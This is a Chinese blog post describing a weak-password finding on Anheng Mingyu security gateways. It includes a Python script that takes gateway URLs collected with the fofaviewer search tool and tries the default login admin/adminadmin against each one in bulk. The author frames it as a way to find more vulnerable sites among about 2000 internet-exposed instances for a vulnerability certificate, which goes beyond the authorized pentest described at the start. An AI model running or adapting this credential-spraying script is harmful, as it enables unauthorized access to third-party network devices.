fofaviewer+python批量扫描弱口令
最近在一次授权内网渗透过程中,发现内网存在安恒的明御安全网关,并且在朋友的帮助下成功进入后台,弱口令进入后台,后台功能十分熟悉,在很多厂商的网关里见过,就随手打了一个poc,好了rce了,于是便有了混个证的想法。但是十个弱口令进后台的网站可难住我了,fofa了一下有2000多个站点,试了十几个就一个弱口令,于是便有了此文,关于fofaviewer+python批量扫描弱口令。脚本只为实现简单的功能大佬轻喷。
fofaviewer自行去github下载。
python脚本如下
import requests
from requests.packages import urllib3
def requests_form(urls):
url = urls + '/login_auth.php'
urla = urls + '/login/login.html'
headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': urla,
'Origin': urls}
data = {'user': 'admin', 'pwd': 'adminadmin'}
urllib3.disable_warnings()
response = requests.post(url, data, headers, verify=False,timeout=2)
# print(response.text)
if '\"code\":\"1\"' in response.text:
print('弱口令存在')
# print(response.text)
with open('1.txt', 'a', encoding='utf-8') as file:
file.write(list[i]+" exist")
else:
print('弱口令不存在')
return response
if __name__ == "__main__":
file = open("url.txt", "r")
list = file.readlines()
i = 0
for number in list:
if 'https' in number:
a=1
else:
list[i] = 'https://' + number
if i == len(list):
continue
print(list[i])
list[i] = list[i].replace('\n', '')
try:
response = requests_form(list[i])
except:
print('It is wrong')
i = i + 1
脚本介绍
总共有三种回显,弱口令存在,不存在,以及wrong
其中,只有弱口令存在时,目标地址和exist标识写入了1.txt
至于fofaviewer
搜索后导出,复制链接到url.txt里,然后拖到python脚本所在路径即可
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 新年开篇:在本地部署DeepSeek大模型实现联网增强的AI应用
· DeepSeek火爆全网,官网宕机?本地部署一个随便玩「LLM探索」
· Janus Pro:DeepSeek 开源革新,多模态 AI 的未来
· 上周热点回顾(1.20-1.26)
· 【译】.NET 升级助手现在支持升级到集中式包管理